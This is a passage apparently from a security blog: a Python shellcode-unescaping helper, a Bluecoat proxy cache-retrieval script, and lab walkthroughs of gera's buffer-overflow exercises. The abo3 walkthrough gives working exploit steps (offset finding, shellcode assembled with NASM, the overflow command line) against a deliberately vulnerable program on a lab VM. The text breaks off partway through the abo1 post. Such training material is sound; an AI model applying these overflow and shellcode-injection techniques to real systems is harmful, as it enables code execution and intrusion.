my @sorted_recs = sort @recs_to_sort;

foreach (@sorted_recs) {
  print OUTFILE "$_\n";
}

Python Unescape 16-bit Unicode String to File

Archived here for me, maybe someone else will need it. Frequently when our analysts are doing malcode analysis, particularly on malicious PDF documents, they see shellcode in the form of 16-bit Unicode values that are then unescaped into the heap calling the Javascript unescape() function. Problem is, we do most of our malicious Javascript analysis from the command line with Spidermonkey, and it has some truncation issues with unescaping 16-bit Unicode correctly (it handles ASCII just fine). The devs are well aware of the issue, btw, so don’t bother them ;-).

So I wrote a quickie to take a string, massage it to the right byte order, and slap it to STDOUT, which the analyst can then redirect to a file or whatever. If there is a much easier way to do this, I’m all ears.

#!/usr/bin/python

import binascii
import sys
import re

# print usage if args wrong
if len(sys.argv) &gt; 2 or len(sys.argv) &lt; 2:
  print &quot;Usage: &quot; + sys.argv[0] + &quot; &lt;string to decode&gt;&quot;
  print &quot;where string is something like '%u30CC%u4560'&quot;
  print &quot;Keep in mind this only works for unicode 16-bit&quot;
  print &quot;which means 2 bytes (four hexadecimal chars with %u&quot;
  print &quot;in front of them).&quot;
  sys.exit()

# convert string to upper since we don't care
string = sys.argv[1].upper()

# clean up the string for processing, do some rudimentary input validation
if re.findall(r'[^UA-F0-9\\%]', string):
  print &quot;invalid string submitted\nonly the following chars are allowed:&quot;
  print ''' % \ u U A-F a-f 0-9 ' &quot; '''
  sys.exit()
string = string.strip('&quot;').strip(&quot;'&quot;)
string = re.sub(r'(%|\\)[U]', '', string)

# check one last time that we have only hex
if re.findall(r'[^A-F0-9]', string):
  print &quot;invalid string submitted\nonly the following chars are allowed:&quot;
  print ''' % \ u U A-F a-f 0-9 ' &quot; '''
  sys.exit()

# split up the string, do our stuff with hex
a = []
for i in string: a.append(i)
if len(a) % 4 != 0:
  print &quot;you are missing some characters, must be in groups of 4&quot;
  print &quot;did your copy mess up?&quot;
  sys.exit()
b = &quot;&quot;
while len(a) &gt; 0:
  b1 = a.pop(0) + a.pop(0)
  b2 = a.pop(0) + a.pop(0)
  b = b + b2 + b1

result = binascii.a2b_hex(b)
sys.stdout.write(result)

Bluecoat ProxySG Cache Retrieval Script in Python

So, I was actually looking at this script today and thought folks who use Bluecoat as proxies at their jobs (I get the impression that they are pretty popular) might be interested in checking it out. It’s kind of like a poor-man’s pcap solution for sites that use a robust Bluecoat proxy but don’t have pcap instrumentation everywhere.

If you give this script a URI, and a list of Bluecoat proxies, and some credentials to those proxies, it essentially goes and grabs the URI, writes it to disk and includes some information on the last time it was modified on disk, etc. Sometimes, you can use this to retrieve malicious payload that is otherwise unavailable to you due to take-down by LE or replay-filtering by the adversary.

Print usage with –help, make sure you define your setup variables appropriately before you run it, and I hope you find it useful.

#!/usr/bin/env python
# creds: I wrote most of this, only thing I used for inspiration was this HTML table parser article: http://simbot.wordpress.com/2006/05/17/html-table-parser-using-python/
# though honestly, his parser is much more feature-rich, his code taught me how the HTMLParser class works
# email me at mishley at-sign gmail dot com for cake and/or questions

import sys
import os
import urllib
from HTMLParser import HTMLParser
import optparse
import re
import time

# setup variables
default_proxies = [ &quot;192.168.1.2&quot;, &quot;192.168.1.3&quot; ] # default list of proxies to use if -p is not provided
bluecoat_web_port = &quot;3443&quot; # web port to access bluecoat proxy web admin interface
bluecoat_web_user = &quot;username&quot; # username for above interface
bluecoat_web_pass = &quot;password&quot; # password for above interface
bluecoat_proxy_port = &quot;3128&quot; # proxy port to request that a proxy directly proxy a request, may also probably use 80

# parse command line args
parser = optparse.OptionParser()
parser.add_option(&quot;-u&quot;, &quot;--uri&quot;, type=&quot;string&quot;, action=&quot;store&quot;, dest=&quot;uri&quot;, help=&quot;URI to retrieve. Must be a file object, not a directory.&quot;)
parser.add_option(&quot;-p&quot;, &quot;--proxyip&quot;, type=&quot;string&quot;, action=&quot;append&quot;, dest=&quot;proxyip&quot;, help=&quot;Proxy IP addresses to search (defaults to all Bluecoats), can be used multiple times for multiple IP addresses. (if used more than once, --all is assumed)&quot;)
parser.add_option(&quot;-l&quot;, &quot;--log&quot;, dest=&quot;log&quot;, action=&quot;store_true&quot;, default=False, help=&quot;Write file object metadata to log file, &lt;filename&gt;.log.&quot;)
parser.add_option(&quot;-a&quot;, &quot;--all&quot;, dest=&quot;all&quot;, action=&quot;store_true&quot;, default=False, help=&quot;Grab a copy of the file from every proxy on which it is found, not just the first in the list. These files may be identical, use md5sum to check.&quot;)
options, args = parser.parse_args()

# input validation
if len(sys.argv) == 1:
        parser.print_help()
        sys.exit()
if options.proxyip and len(options.proxyip) &gt; 1:
	options.all = True
if not options.proxyip:
	options.proxyip = default_proxies
else:
	for i in options.proxyip:
		if re.search('[^0-9\.]', i):
			parser.error(&quot;Option --proxyip must use a valid IP address, exiting.&quot;)
if not options.uri:
	parser.error(&quot;Option --uri is required for use, exiting.&quot;)

class proxyopen(urllib.FancyURLopener):
	def prompt_user_passwd(self, host, realm):
		return bluecoat_web_user, bluecoat_web_pass
	def http_error_401(self, url, fp, errcode, errmsg, headers, data=None):
		&quot;&quot;&quot;Error 401 -- authentication required. This function supports Basic authentication only.&quot;&quot;&quot;
		self.tries += 1
		if self.maxtries and self.tries &gt;= self.maxtries:
			self.tries = 0
			return self.http_error_default(url, fp, 500, &quot;HTTPS Basic Auth timed out after &quot;+str(self.maxtries)+&quot; attempts.&quot;, headers)
		if not 'www-authenticate' in headers:
			URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		stuff = headers['www-authenticate']
		import re
		match = re.match('[ \t]*([^ \t]+)[ \t]+realm=&quot;([^&quot;]*)&quot;', stuff)
		if not match:
			URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		scheme, realm = match.groups()
		if scheme.lower() != 'basic':
			URLopener.http_error_default(self, url, fp, errcode, errmsg, headers)
		name = 'retry_' + self.type + '_basic_auth'
		if data is None:
			return getattr(self,name)(url, realm)
		else:
			self.tries = 0
			return getattr(self,name)(url, realm, data)

def checkURI(uri=&quot;http://www.google.com/favicon.ico&quot;, proxyip=&quot;192.168.1.2&quot;):
	opener = proxyopen()
	protocol, domainandpath = uri.split('//')
	protocol = protocol.rstrip(':')
	if protocol != 'http':
		sys.exit(&quot;Cannot process non-http requests, exiting.&quot;)
	try: page = opener.open(&quot;https://&quot; + proxyip + &quot;:&quot; + bluecoat_web_port + &quot;/CE/Info/&quot; + protocol + &quot;/&quot; + domainandpath).read()
	except: return &quot;NOCONN_0xDEADBEEF&quot;
	if page.find('Authentication required') &gt; -1: return &quot;NOAUTH_0xDEADBEEF&quot;
	if page.find('0x00000007') == -1 and page.find('CE URL Information') &gt; -1: return page
	else: return &quot;NOTFOUND_0xDEADBEEF&quot;

def fdURI(uri=&quot;http://www.google.com/favicon.ico&quot;, proxyip=&quot;192.168.1.2&quot;):
	proxy = { 'http': 'http://'+proxyip+':'+bluecoat_proxy_port }
	fd = urllib.urlopen(uri, proxies=proxy)
	return fd

class parseTable(HTMLParser):
	def __init__(self):
		HTMLParser.__init__(self)
		self.in_table = 0
		self.in_tr = 0
		self.in_td = 0
		self.tabledata = []
	def handle_starttag(self, tag, attrs):
		if tag == 'table': self.in_table = 1
		if tag == 'tr': self.in_tr = 1
		if tag == 'td': self.in_td = 1
	def handle_data(self, data):
		if self.in_td and self.in_tr and self.in_table:
			self.tabledata.append(data)
	def handle_endtag(self, tag):
		if tag == 'table': self.in_table = 0
		if tag == 'tr': self.in_tr = 0
		if tag == 'td': self.in_td = 0

if __name__ == &quot;__main__&quot;:
	filename = options.uri.split('/')[-1]
	for proxy in options.proxyip:
		meta = checkURI(options.uri, proxy)
		if meta == &quot;NOCONN_0xDEADBEEF&quot;:
			print &quot;Unable to connect to proxy &quot;+proxy+&quot; via urllib to find URL '&quot;+options.uri+&quot;'.&quot;
			continue
		elif meta == &quot;NOTFOUND_0xDEADBEEF&quot;:
			print &quot;Unable to locate URL '&quot;+options.uri+&quot;' in proxy &quot;+proxy+&quot;.&quot;
			continue
		elif meta == &quot;NOAUTH_0xDEADBEEF&quot;:
			print &quot;Unable to authenticate to proxy &quot;+proxy+&quot;.&quot;
			continue
		else:
			fd = fdURI(options.uri, proxy)
			outstring = fd.read()
			# we are going to re-grab meta data now that we've potentially
			# modified the last-cached timestamp
			meta = checkURI(options.uri, proxy)
			tableparser = parseTable()
			tableparser.feed(meta)
			tableparser.close()
			parsed = tableparser.tabledata
			tableparser = None
			lastretrieved = time.strftime(&quot;%Y%m%d_%H:%M:%S_UTC&quot;, time.strptime(' '.join(parsed[9].split()[2:4]), &quot;%m/%d/%Y %H:%M:%S&quot;))
			fullname = filename+&quot;_&quot;+proxy+&quot;_&quot;+lastretrieved
			outfile = open(fullname, 'wb')
			outfile.write(outstring)
			outfile.close()
			fd.close()
			print &quot;Downloaded file '&quot;+fullname+&quot;' successfully.&quot;
			if options.log:
				logfile = open(fullname+&quot;.log&quot;, 'wb')
				j = 0
				for i in parsed:
					j = j + 1
					if j % 2 == 0: logfile.write(i+&quot;\n&quot;)
					else: logfile.write(i+&quot; :: &quot;)
				logfile.close()
				print &quot;Successfully wrote metadata to file '&quot;+fullname+&quot;.log'.&quot;
			if options.all: continue
			else: break

Insecure Programming by Example: abo3.c

Updated 03/20/2010 to add an excellent introduction to pointers in C and C++.

The theme for this exercise was provided by one of the folks I follow on Twitter.

@kpyke: And so sayeth the @pusscat: “If you gave me the source code, I’d just compile it and look at it in a debugger anyways…”

This got me thinking, especially in the context of this challenge, that the source code sometimes isn’t all that useful. This is true in this case with this exercise. And maybe this is a milestone in my understanding of “how shit works”, but I have a feeling I’ll be spending a lot more time with the built-in disassemblers in gdb/Ollydbg/Windbg than with a list of the source.  This time, we’ll be working on abo3.c, the next in gera’s series on Insecure Programming. I’m aiming for brevity from now on in these posts so they are not so much work (I’m lazy), so let’s get straight to the code.

gera says:

microprocessor ownership

How to make the microprocessor make what you want? Who owns the Instruction Pointer, owns the execution flow, and that’s what we need. All bytes are composed of bits, but some of them are just numbers, and some of them are addresses to code. Jump! Geronimoooooooooo…

/* abo3.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step                     */

int main(int argv,char **argc) {
   extern system,puts;
   void (*fn)(char*)=(void(*)(char*))&amp;system;
   char buf[256];

   fn=(void(*)(char*))&amp;puts;
   strcpy(buf,argc[1]);
   fn(argc[2]);
   exit(1);
}

gera continues:

buf is in the stack, and after it are some bits you can change, that you’ve learnt in abo1.

In case you wonder why we put that there, is so the linker doesn’t remove it.

This exercise makes use of a couple of things we haven’t covered in previous posts. One, this code uses the extern keyword in the C language to make the system and puts functions available. What this does (I think) is basically references directly the location of a function defined in the (implied) header files…I get the impression that GDB is auto-magically including the header files stdlib.h for system and stdio.h for puts.  One thing that is not immediately clear is that the system and puts addresses are both written to the same location, I think that might be what gera is talking about “so the linker doesn’t remove it”.  Secondly, this code makes extensive use of pointers in C, which is a subject I probably need to learn a lot more on.  As a quick summary, pointers contain a memory address, and have various unary operators that apply to them.  For a pointer named (creatively) POINTER, you could use the & or address-of operator to know the actual address of the variable – &POINTER, or you could use POINTER without any operators and that will return the memory address that POINTER contains, or you could dereference the variable using the * operator like *POINTER and that gives you the data contained at the address the pointer references.  Pointers can get nested, and be generally confusing.  You should read up on this, as it’s an important subject, and I’m not speaking from a great deal of experience.

As is always the case, we’ll not focus too much on the high-level representation of this code, rather, we’ll disassemble it in GDB. Here is a deadlist of the compiled executable.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 &lt;main+0&gt;:    push   ebp
0x08048415 &lt;main+1&gt;:    mov    ebp,esp
0x08048417 &lt;main+3&gt;:    sub    esp,0x128
0x0804841d &lt;main+9&gt;:    and    esp,0xfffffff0
0x08048420 &lt;main+12&gt;:   mov    eax,0x0
0x08048425 &lt;main+17&gt;:   sub    esp,eax
0x08048427 &lt;main+19&gt;:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e &lt;main+26&gt;:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 &lt;main+33&gt;:   mov    eax,DWORD PTR [ebp+12]
0x08048438 &lt;main+36&gt;:   add    eax,0x4
0x0804843b &lt;main+39&gt;:   mov    eax,DWORD PTR [eax]
0x0804843d &lt;main+41&gt;:   mov    DWORD PTR [esp+4],eax
0x08048441 &lt;main+45&gt;:   lea    eax,[ebp-0x118]
0x08048447 &lt;main+51&gt;:   mov    DWORD PTR [esp],eax
0x0804844a &lt;main+54&gt;:   call   0x804831c &lt;strcpy@plt&gt;
0x0804844f &lt;main+59&gt;:   mov    eax,DWORD PTR [ebp+12]
0x08048452 &lt;main+62&gt;:   add    eax,0x8
0x08048455 &lt;main+65&gt;:   mov    eax,DWORD PTR [eax]
0x08048457 &lt;main+67&gt;:   mov    DWORD PTR [esp],eax
0x0804845a &lt;main+70&gt;:   mov    eax,DWORD PTR [ebp-12]
0x0804845d &lt;main+73&gt;:   call   eax
0x0804845f &lt;main+75&gt;:   mov    DWORD PTR [esp],0x1
0x08048466 &lt;main+82&gt;:   call   0x804833c &lt;exit@plt&gt;
End of assembler dump.

As is the case it seems when trying to do these exploits, we basically have to ask ourselves what it is within the programs execution that we control? Where does the program accept input from the user, and what does that mean to us? In this case, the program is using the ever-awesome strcpy function, which of course does not do a bounds check, and is copying a bunch of our data to the stack (as much as we want). We would typically move forward with overwriting the main stack frame’s return address, and controlling execution that way. Unfortunately, there is a pesky call to exit which we first encountered in the last example that will prevent us from doing that.

So we’ll have to go some other route. The obvious candidate to me is the call eax instruction. If we can somehow control the contents of the eax register at that point, we can take control of execution, and run arbitrary code. I think this particular exercise contains an important lesson; sometimes the actual high level code can be harder to understand than the disassembled code. I personally feel that this is the case here. If we only pay attention to what’s in the debugger, this is actually not such a tricky exercise.

We know fn is a function pointer that is called. In the deadlisting, it resides at ebp-12. Basically, if we can control the contents of ebp-12 we can control execution. This actually turns out to be really easy, since fn is declared in main as a stack variable by the assembler it will be trivial to overwrite with the unbounded strcpy() call. Here is a record of the exploit.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q abo3
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 &lt;main+0&gt;:    push   ebp
0x08048415 &lt;main+1&gt;:    mov    ebp,esp
0x08048417 &lt;main+3&gt;:    sub    esp,0x128
0x0804841d &lt;main+9&gt;:    and    esp,0xfffffff0
0x08048420 &lt;main+12&gt;:   mov    eax,0x0
0x08048425 &lt;main+17&gt;:   sub    esp,eax
0x08048427 &lt;main+19&gt;:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e &lt;main+26&gt;:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 &lt;main+33&gt;:   mov    eax,DWORD PTR [ebp+12]
0x08048438 &lt;main+36&gt;:   add    eax,0x4
0x0804843b &lt;main+39&gt;:   mov    eax,DWORD PTR [eax]
0x0804843d &lt;main+41&gt;:   mov    DWORD PTR [esp+4],eax
0x08048441 &lt;main+45&gt;:   lea    eax,[ebp-0x118]
0x08048447 &lt;main+51&gt;:   mov    DWORD PTR [esp],eax
0x0804844a &lt;main+54&gt;:   call   0x804831c &lt;strcpy@plt&gt;
0x0804844f &lt;main+59&gt;:   mov    eax,DWORD PTR [ebp+12]
0x08048452 &lt;main+62&gt;:   add    eax,0x8
0x08048455 &lt;main+65&gt;:   mov    eax,DWORD PTR [eax]
0x08048457 &lt;main+67&gt;:   mov    DWORD PTR [esp],eax
0x0804845a &lt;main+70&gt;:   mov    eax,DWORD PTR [ebp-12]
0x0804845d &lt;main+73&gt;:   call   eax
0x0804845f &lt;main+75&gt;:   mov    DWORD PTR [esp],0x1
0x08048466 &lt;main+82&gt;:   call   0x804833c &lt;exit@plt&gt;
End of assembler dump.
(gdb) break 1
Breakpoint 1 at 0x8048414: file abo3.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo3 one two

Breakpoint 1, main (argv=134513684, argc=0x3) at abo3.c:6
6       int main(int argv,char **argc) {
(gdb) x $ebp-12
0xbffff82c:     0xb8000ff4
(gdb) x buf
0xbffff720:     0x080481ac
(gdb) print 0xbffff82c-0xbffff720
$1 = 268
(gdb) delete breakpoints
Delete all breakpoints? (y or n) y
(gdb) break *0x0804845d
Breakpoint 2 at 0x804845d: file abo3.c, line 13.
(gdb) run $(perl -e 'print &quot;A&quot; x 268 . &quot;BBBB&quot;;') argtwo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo3 $(perl -e 'print &quot;A&quot; x 268 . &quot;BBBB&quot;;') argtwo

Breakpoint 2, 0x0804845d in main (argv=3, argc=0xbffff754) at abo3.c:13
13              fn(argc[2]);
(gdb) x $eax
0x42424242:     Cannot access memory at address 0x42424242

Since the program in question isn’t pushing and popping at all, and doesn’t appear to be modifying esp or ebp that much, we can just run the program once real quick from the beginning to populate the registers and determine the offset between our unbounded strcpy destination buf and ebp-12. Once we have the offset, we’ll re-run the program with a quick inline Perl script to print the offset-worth of junk bytes and the string “BBBB” to overwrite ebp-12. I’ve placed a breakpoint directly before the call eax instruction, and at that point we examine eax to confirm that we control execution. Now here is a quickie with shellcode that we’ll reuse from abo1.c.

hacking@hacking-theart:~/InsecureProgramming $ cat abo3shellc.txt
BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db &quot;you win!&quot;  ; with newline and carriage return bytes.
hacking@hacking-theart:~/InsecureProgramming $ nasm -o abo3shellc.bin abo3shellc.txt
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C abo3shellc.bin
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat abo3shellc.bin)
hacking@hacking-theart:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=�Y1��1�C1̀�K̀�����you win!
hacking@hacking-theart:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo3
abo3            abo3.c          abo3shellc.bin  abo3shellc.txt
hacking@hacking-theart:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo3
SHELLCODE will be at 0xbffff9d2
hacking@hacking-theart:~/InsecureProgramming $ ./abo3 $(perl -e 'print &quot;A&quot; x 268 . &quot;\xd2\xf9\xff\xbf&quot;;') two
you win!hacking@hacking-theart:~/InsecureProgramming $

Insecure Programming by Example: abo2.c, not vulnerable…o rly?

Introduction

Note 02/13/2010: This post has been a long time coming (started on 01/15 I think), I’m sorry for the delay. At first, it took me a while to (SPOILER, YOU WILL DIE ALONE) find out that abo2.c was not exploitable under x86 due to the exit() call…I saw this immediately, but it took me a while to believe it. Then, I researched other possible ways it could be exploited, and then searched around for a machine on which to test. I ended up cutting the post short from what I had intended, because I couldn’t get my hands on a PA-RISC machine to test with, and QEMU support for PA-RISC is not quite there yet. The post may be a bit rough, any mistakes are all mine, and I’ll gladly accept corrections anywhere they are needed.

After a long time of head banging (and not the good kind), I finally have something good to report in regards to abo2.c, and I figured I’d write it all up for your enjoyment. Here’s the deal, abo2.c is not vulnerable to code execution on Linux using x86 architectures (the important bit here is x86, not so much Linux). That doesn’t mean it can’t be exploited…these are definitely not the same thing. Many folks state (correctly) that abo2.c is not vulnerable under x86 and then move on.

My thought process is that in my dream job, I’d be working with more architectures than just x86, so why limit myself? Keep in mind the object of the game. You are supposed to win, not just learn a valuable lesson. Ok, so if you just move on, you get the bit about why exit() is a deal breaker…big deal. Why not learn to win? Why not examine some different techniques that could have been applied if this code had been slightly different, or different techniques that could be applied (even better) with the code completely unchanged but compiled on a different processor architecture? The goal is to win and to learn something, so let’s do both! 😉

Let’s talk about the code real quick, and why it’s not vulnerable.

/* abo2.c                                       *
 * specially crafted to feed your brain by gera */

/* This is a tricky example to make you think   *
 * and give you some help on the next one       */

int main(int argv,char **argc) {
	char buf[256];

	strcpy(buf,argc[1]);
	exit(1);
}

What’s new here, as opposed to the abo1.c exercise which we successfully exploited only…weeks ago (I haven’t posted in a while, jeebus)? The only difference is a call to the exit() function at the end of the code. That is a real deal breaker for x86 exploitation, let’s examine why this is the case quickly.

You’ll recall that we’ve been reliably exploiting all of our vulnerable programs so far by overwriting the return address which is saved on main()’s stack frame (frame #0). The thing is, exit never returns to the main() function. As a matter of fact, if you disassemble the main() function you’ll see that there is nothing below the call to exit.

(gdb) disas main
Dump of assembler code for function main:
0x080483b4 :    push   ebp
0x080483b5 :    mov    ebp,esp
0x080483b7 :    sub    esp,0x118
0x080483bd :    and    esp,0xfffffff0
0x080483c0 :   mov    eax,0x0
0x080483c5 :   sub    esp,eax
0x080483c7 :   mov    eax,DWORD PTR [ebp+12]
0x080483ca :   add    eax,0x4
0x080483cd :   mov    eax,DWORD PTR [eax]
0x080483cf :   mov    DWORD PTR [esp+4],eax
0x080483d3 :   lea    eax,[ebp-0x108]
0x080483d9 :   mov    DWORD PTR [esp],eax
0x080483dc :   call   0x80482c4
0x080483e1 :   mov    DWORD PTR [esp],0x1
0x080483e8 :   call   0x80482d4
End of assembler dump.

What this means is that execution never returns to the original program from exit. You can verify this behavior yourself by trying to set a breakpoint after exit, or trying to step over the call to exit, you’ll see that the program merely exits. We can’t overflow the return address and have it matter, because the processor will never get back there. Game over man, game over.

The only way to beat this would be to prevent exit() from being called, which is a valid strategy that we should explore. To me, that still fulfills the idea of “gaining control”, sometimes preventing a program from doing something is just as important as making a program do something else…you think that all the crackers out there make programs authenticate themselves fraudunlently, or just prevent them from authenticating the validity of the license? Either path has merit.

Insert Coin to Continue

I was a big fan of arcade games growing up. I had a mean hadouken and dragon punch. Part of getting pretty good at arcade games was not giving up. Keep putting in coins. Keep playing. Get better. If some bastard had the machine monopolized and was beating all comers, well, beg your parents for change, because nothing would make you good faster than getting the tar kicked out of you. For me, abo2.c is that bastard at the machine.

If I have one regret about how I handled this exercise, it’s that I spent too much time pondering and not enough time on the debugger. Too much time Googling, not enough time GDBing. This exercise taught me to not be afraid of disassembling everything, even libc calls, to determine the flow of execution, and it also taught me that the assembled code is really what matters. In the end, I wasted a lot of time re-thinking thoughts when I already knew the answer, abo2.c was NOTVULN on x86 Linux (at least, not vulnerable to code execution…a Denial-of-Service condition exists of course by way of segmentation fault). Once a friend helped me see that this was the case (thanks @kpyke), I resolved to beat the program anyway, in any way I could. I also learned some new stuff I’d like to show you which looked at first blush like solutions on x86, but ended up being inadequate.

What Could Have Been

From “Overwriting the .dtors section.” by Juan M. Bello Rivas:

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;

static void bleh(void);

int
main(int argc, char *argv[])
{
        static u_char buf[] = &quot;bleh&quot;;

        if (argc &lt; 2)
                exit(EXIT_FAILURE);

        strcpy(buf, argv[1]);

        exit(EXIT_SUCCESS);
}

void
bleh(void)
{
        printf(&quot;goffio!\n&quot;);
}

This paper details the process of exploiting situations in which you may not control execution via arbitrary memory writes OR return address overwrites. This paper taught me a lot in reading it even though it wasn’t a solution for abo2.c on x86, I suggest you read it as well and I figured it was worth outlining what it could have been a solution to.

Note the differences; he’s declared the buf character array as a static variable, and declared it initialized (with value/data) as well. When he does this, the variable is no longer located on the stack, since by definition a static variable must persist through a stack frame and be available to other functions that wish to use it. The variable ends up residing in the .data section of the executable file, and in older versions of GCC (used at the time of the writing of the paper, but no longer the case since at least 2006, if not earlier) .data comes before .dtors in memory. What is .dtors? .dtors is a mnemonic for “destructors” (while .ctors is for “constructors”), in the C programming language you have constructors and destructors, which are attributes you can assign to a function to have it be automatically executed on enter or exit (for instance, to clean up allocated memory on the heap or something like that which C does not do automatically). The .dtors and .ctors sections are the GCC implementation of constructors for the ELF file format. Even if there are no constructor or destructor attributes defined in the program, GCC still defines the .dtors section in an ELF file, it just leaves the section empty. When destructors are called, the program jumps execution to an address described in the .dtors section, if it hits NULL bytes it does nothing. Here is what an empty .dtors section looks like:

$ objdump -s -j .dtors bleh

bleh:     file format elf32-i386

Contents of section .dtors:
 804955c ffffffff 00000000                    ........

To make it quick(er), if we overwrite the value 00000000 with an address containing instructions, that address will be jumped to on program exit. If we place our shellcode in an environment variable (see my post on abo1.c or stack5.c for details), we can simply overwrite with the address of the shellcode and execute whatever we wish, or as in the author’s example we can redirect execution flow to another function in memory that otherwise would not be hit. Remember that our statically-declared variable buf is right next to .dtors in memory, and since strcpy() is not doing bounds checking, we can overwrite it after we determine the offset and execute arbitrary code. The paper really is a fun read, I suggest you take a look.

It is also worth mentioning one more paper that is unfortunately not applicable here, but is still an interesting read. “How to hijack the Global Offset Table with pointers for root shells” by c0ntex is an excellent overview of the concepts regarding the Procedure Linkage Table and the Global Offset Table, two ripe areas for controlling execution if you are fortunate enough to be able to overwrite the pointers contained therein. In short, the PLT and GOT are essentially how a given program knows where to find a shared library call (such as exit in libc). If we could overwrite the pointers in the table, we could execute arbitrary code in place of the call to exit(). Unfortunately, abo2.c does not present an opportunity to do this, nor do stack buffer overflows in general. A format string bug would probably be the best way to execute this attack, so far as I know, but it’s still a very interesting read that I encountered doing research for this article.

Architecture is Important

All of our examples so far have been exploited on an x86 virtual machine (powered by the great free tool VirtualBox) running an old, vulnerable version of Linux with many security features disabled, such as non-executable stack protection, or address space layout randomization. But in this case, we’ve merely been defeated by the design of the x86 stack. Due to the way the stack is arranged in memory, and the fact that our overflowed buffer is located therein, there is nothing we control that gives us any value.

What if we compiled it on a different architecture? Would it work then? How about an architecture that arranged it’s stack differently. Some architectures don’t actually store the stack in main memory, some of them (such as ARM) implement the stack in registers, which I suppose speeds things up, but limits the amount of data that can be stored therein (just speculation, I know dick all about most of this stuff ;-), I’m sure there’s a trade-off though). Some processors do not grow the stack from high-to-low memory addresses, they instead grow it from low-to-high just like other constructs such as the heap. What this means is that those processors are protected from return-address overwrites, because the return addresses are actually on lower addresses than the beginning of the vulnerable buffer. That does not mean that the processor is a safe haven for unbounded functions, though, not at all.

You probably already realize what this means if you’ve been following along and paying attention. This means that we can overwrite the return address of the strcpy() function itself. This means that we never need to leave the strcpy() function to gain control (conceptually, at least), and that we don’t have to wait for the end of the program (main’s return address) like we do on x86. This means that we’ll never get to the exit() call, and that abo2.c is exploitable under certain conditions. In researching this technique, I found out that it’s been done through Phrack #58 Article 11 by Zhodiac, and that it’s a really good read if you’ve never done any low level work on “exotic” architectures. So, instead of doing the exploit myself (mainly due to lack of resources, PA-RISC machines are ~$200.00 on eBay and virtualization is essentially non-existent), I’ll just recommend you give Zhodiac’s paper a read.

Man, I’m glad this post is done with. Procrastination is the devil, on to the next challenge!

Insecure Programming by Example: Advanced Buffer Overflows 1

Introexecuduction

Ok, after a nice break, I’m ready to…break :-). I have a couple of Python related posts in my docket, but today we’re going to start work on the next exploit exercises by Gera in his Insecure Programming by Example series, Advanced Buffer Overflows! I hope they aren’t too advanced. This should be refreshing to write about, because I havent done any of these yet. On to the code!

Gera says:
Advanced Buffer Overflow #1

blind obedience

What would happen if you store 512 characters where there is only space for 256? You may claim that you can’t, and you’ll be right, but still, there are situations that, unconsciously, you tell the micro to do so, and he can only but obey you… and he’ll do his best without thinking of side effects. Now is when we get technical, fasten your seat belts, this turbulence will last forever.

What defines a buffer overflow is the copy of a memory region into another region not big enough to contain it.

/* abo1.c                                       *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced...    */

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

Gera continues:
This is a good and simple abo: on execution this program will copy the contents of argc[1] *1, whatever it is, into the reserved 256 bytes named buf, strcpy() will not do any checks of any kind, it will just copy bytes from source to destination, from argc[1] to buf, until it finds a zero. Here, a chance is given for us to supply a longer-than-expected argc[1] to write in memory past the end of the reserved space named buf. Why is this a security problem? becouse we can change data that we shouldn’t be able to, and usually, this data we can change has a very special meaning for the micro, and by exploiting this meaning, we can confuse the micro and make it do what we want. That’s the secret, go get a debugger, a compiler, and all the tools you think you’ll need, and find out what’s the data after buf and why it’s so important to be able to modify it.

1 – argc and argv are just names for main’s arguments, they just name chunks of bits in memory, their names are not meaningful by their own but for their context.

On a side note, I’m not sure why this compiles correctly without doing #include <stdio.h> but it does work with even a really old version of gcc. Either way, the notes that Gera provides are well worth reading and understanding. This is actually a fairly easy piece of code to exploit, given what we’ve worked with previously in the stackN.c series. We’ll actually re-use our shellcode from that series to print out “you win!” upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use here.

Exploitimitation

The only change of note for this vulnerable piece of software is the use of the strcpy() function. You may remember we discussed earlier why this function, along with gets() and a bunch of others, is not a good idea to use. It is the use of the strcpy() function that allows us to overflow the buffer, as it does not do bounds-checking on input to the buffer. This function just copies whatever you give it to the buffer, the copy continues unchecked, and can be used in a similar way as our gets() function was used to overwrite other areas on the stack (or beyond) to gain control over EIP and hence program execution.

What we’re going to do is this:

